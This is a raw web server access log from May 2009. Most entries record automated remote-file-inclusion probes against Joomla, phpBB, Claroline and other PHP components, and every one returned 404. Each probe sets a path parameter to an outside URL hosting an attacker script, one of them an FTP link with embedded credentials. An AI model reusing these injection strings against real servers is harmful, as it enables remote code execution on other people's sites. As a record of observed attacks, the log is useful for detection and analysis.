72.52.255.82 - - [16/May/2009:01:23:52 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.112.140.135 - - [16/May/2009:01:24:08 -0400] "GET /logs/access_log.Q109022600//components/errors.php?error=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
84.112.140.135 - - [16/May/2009:01:24:13 -0400] "GET //components/errors.php?error=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.820"
84.112.140.135 - - [16/May/2009:01:24:19 -0400] "GET /logs//components/errors.php?error=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.820"
88.84.128.40 - - [16/May/2009:01:24:50 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:24:50 -0400] "GET //components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:24:50 -0400] "GET /logs//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
72.52.255.82 - - [16/May/2009:01:25:20 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:25:20 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
163.20.116.193 - - [16/May/2009:01:25:39 -0400] "GET /logs/error_log.Q108081200//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:01:25:39 -0400] "GET /logs/error_log.Q108051600//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.30.100.203 - - [16/May/2009:01:25:53 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.30.100.203 - - [16/May/2009:01:25:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.30.100.203 - - [16/May/2009:01:25:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.30.100.203 - - [16/May/2009:01:25:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [16/May/2009:01:25:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.172.92.14 - - [16/May/2009:01:26:07 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:26:07 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:26:07 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
85.214.86.93 - - [16/May/2009:01:26:33 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:26:33 -0400] "GET /logs/access_log.Q108100900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:26:33 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.18.76.16 - - [16/May/2009:01:26:44 -0400] "GET /logs/access_log.Q108091400//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:26:44 -0400] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:26:44 -0400] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:26:53 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:26:53 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:26:59 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:26:59 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
217.18.76.16 - - [16/May/2009:01:27:11 -0400] "GET /logs/access_log.Q108082500//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
85.214.86.93 - - [16/May/2009:01:27:14 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:01:27:24 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:27:25 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
217.147.29.190 - - [16/May/2009:01:28:05 -0400] "GET /logs/access_log.Q109012800%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:28:09 -0400] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:28:09 -0400] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:28:15 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:28:15 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.147.29.190 - - [16/May/2009:01:28:32 -0400] "GET /logs/access_log.Q108081500%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:01:28:33 -0400] "GET /logs/access_log.Q108060200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:33 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:33 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:33 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:34 -0400] "GET /logs/access_log.Q108060200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:34 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:34 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:28:34 -0400] "GET /logs/access_log.Q108081800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
88.84.128.40 - - [16/May/2009:01:28:36 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:28:36 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:28:36 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
72.52.255.82 - - [16/May/2009:01:28:43 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:28:43 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
69.94.30.156 - - [16/May/2009:01:28:48 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:28:48 -0400] "GET /logs/access_log.Q108100900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:28:48 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:28:56 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:28:56 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
207.182.147.210 - - [16/May/2009:01:29:03 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 216 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
207.182.147.210 - - [16/May/2009:01:29:03 -0400] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 221 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
69.94.30.156 - - [16/May/2009:01:29:05 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
207.182.147.210 - - [16/May/2009:01:29:06 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
207.182.147.210 - - [16/May/2009:01:29:06 -0400] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
85.214.86.93 - - [16/May/2009:01:29:10 -0400] "GET /logs/access_log.Q108100900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:01:29:22 -0400] "GET /logs/access_log.Q108082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:01:29:29 -0400] "GET /logs/access_log.Q109022600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:29:29 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:29:29 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
88.84.147.205 - - [16/May/2009:01:29:36 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
88.84.147.205 - - [16/May/2009:01:29:36 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
72.52.255.82 - - [16/May/2009:01:29:53 -0400] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:29:53 -0400] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
69.94.30.156 - - [16/May/2009:01:29:54 -0400] "GET /logs/access_log.Q108100900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:29:57 -0400] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:29:57 -0400] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:01:29:57 -0400] "GET /logs/access_log.Q109012800%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
75.43.48.5 - - [16/May/2009:01:30:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:30:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:30:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:30:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
69.94.30.156 - - [16/May/2009:01:30:04 -0400] "GET /logs/access_log.Q108082900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.52.164.18 - - [16/May/2009:01:30:14 -0400] "GET /logs/access_log.Q109050800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
217.147.29.190 - - [16/May/2009:01:30:31 -0400] "GET /logs/access_log.Q108081500%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
205.234.185.80 - - [16/May/2009:01:30:54 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
205.234.185.80 - - [16/May/2009:01:30:54 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [16/May/2009:01:31:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:01:32:26 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:32:26 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.220.4.131 - - [16/May/2009:01:33:36 -0400] "GET /logs/access_log.Q108112200%20/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:01:33:36 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:01:33:36 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:33:42 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:33:42 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:33:43 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
163.20.116.193 - - [16/May/2009:01:34:06 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:01:34:06 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:01:34:06 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.800"
163.20.116.193 - - [16/May/2009:01:34:06 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/idv6.txt?%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.800"
74.52.164.18 - - [16/May/2009:01:34:14 -0400] "GET /logs/access_log.Q109022600//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:34:14 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:34:16 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
66.220.4.131 - - [16/May/2009:01:34:32 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
66.220.4.131 - - [16/May/2009:01:34:32 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
74.52.164.18 - - [16/May/2009:01:34:39 -0400] "GET /logs/access_log.Q109050800//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
217.147.29.190 - - [16/May/2009:01:35:04 -0400] "GET /logs/access_log.Q109012800//claroline/inc/claro_init_header.inc.php?includePath=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.196.124.252 - - [16/May/2009:01:35:11 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
